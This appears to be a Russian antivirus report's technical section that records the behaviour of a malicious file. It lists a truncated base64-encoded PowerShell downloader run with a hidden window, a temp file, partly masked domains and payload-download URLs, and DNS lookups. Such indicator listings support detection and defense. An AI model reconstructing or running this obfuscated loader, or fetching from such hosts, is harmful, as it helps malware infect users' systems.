Техническая информация
- '<SYSTEM32>\windowspowershell\v1.0\powershell.exe' -ENCOD JABTAHUAMQAyADEAMAA5AD0AKAAoACcARgA3ADUAJwArACcAaAAwACcAKQArACcAZAA2ACcAKQA7AC4AKAAnAG4AZQB3AC0AaQB0ACcAKwAnAGUAbQAnACkAIAAkAGUAbgB2ADoAVQBTAGUAcgBQAFIATwBGAEkATABlAFwARQ...
- '%CommonProgramFiles%\Microsoft Shared\DW\DW20.EXE' -x -s 1532
- %TEMP%\1170054.cvr
- 'yo##el.com':443
- 'bl##.#igikhata.com':80
- 'te##.#ihchina.com':80
- 'te##.#ihchina.com':443
- 'sa#####consulting.in':80
- '35.##0.95.205':80
- http://bl##.#igikhata.com/denunciar/o2/
- http://te##.#ihchina.com/install/1b0IsII/
- http://www.sa#####consulting.in/wp-content/En/
- 'yo##el.com':443
- 'te##.#ihchina.com':443
- DNS ASK yo##el.com
- DNS ASK xi###ico.com
- DNS ASK on####ws24x7.com
- DNS ASK bl##.#igikhata.com
- DNS ASK te##.#ihchina.com
- DNS ASK sa#####consulting.in
- '<SYSTEM32>\windowspowershell\v1.0\powershell.exe' -ENCOD JABTAHUAMQAyADEAMAA5AD0AKAAoACcARgA3ADUAJwArACcAaAAwACcAKQArACcAZAA2ACcAKQA7AC4AKAAnAG4AZQB3AC0AaQB0ACcAKwAnAGUAbQAnACkAIAAkAGUAbgB2ADoAVQBTAGUAcgBQAFIATwBGAEkATABlAFwARQ...' (со скрытым окном)